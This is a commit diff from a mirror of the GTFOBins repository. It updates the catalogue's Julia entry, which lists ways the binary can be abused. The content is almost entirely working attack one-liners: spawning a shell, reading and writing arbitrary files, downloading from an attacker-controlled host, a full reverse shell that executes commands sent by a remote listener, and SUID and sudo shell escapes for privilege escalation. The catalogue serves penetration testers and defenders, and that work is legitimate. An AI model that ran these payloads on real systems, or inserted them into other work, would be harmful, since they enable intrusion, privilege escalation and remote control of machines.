1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00

Clean and fix julia

This commit is contained in:
Andrea Cardaci 2023-04-20 08:51:20 +02:00 committed by GitHub
parent 7a4a16409a
commit 43f2ea0428
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

@ -1,16 +1,21 @@
--- ---
description: |
All payloads are compatible with the Base packages from Julia.
functions: functions:
shell: shell:
- description: The `run()` function runs every command passed as parameter with what is defined in `$JULIA_SHELL`. Defaults to the environment variable `$SHELL`, and falls back to `/bin/sh` if `$SHELL` is unset. - code: |
- code: julia -e 'while true; c = split(readline()); run(`$c`); end;' julia -e 'run(`/bin/sh`)'
file-read: file-read:
- code: julia -e 'println(open(f->read(f, String), "file_to_read"))' - code: |
export LFILE=file_to_read
julia -e 'print(open(f->read(f, String), ENV["LFILE"]))'
file-write: file-write:
- code: julia -e 'open(f->write(f, "DATA"), "file_to_write", "w")' - code: |
export LFILE=file_to_write
julia -e 'open(f->write(f, "DATA"), ENV["LFILE"], "w")'
file-download: file-download:
- code: julia -e 'download("URL", "PATH")' - code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
julia -e 'download(ENV["URL"], ENV["LFILE"])'
reverse-shell: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
@ -18,8 +23,9 @@ functions:
export RPORT=12345 export RPORT=12345
julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;' julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'
suid: suid:
- code: julia -e 'while true; c = split(readline()); run(`$c`); end;' - code: |
./julia -e 'run(`/bin/sh -p`)'
sudo: sudo:
- description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. - code: |
- code: sudo julia -e 'while true; c = split(readline()); run(`$c`); end;' sudo julia -e 'run(`/bin/sh`)'
--- ---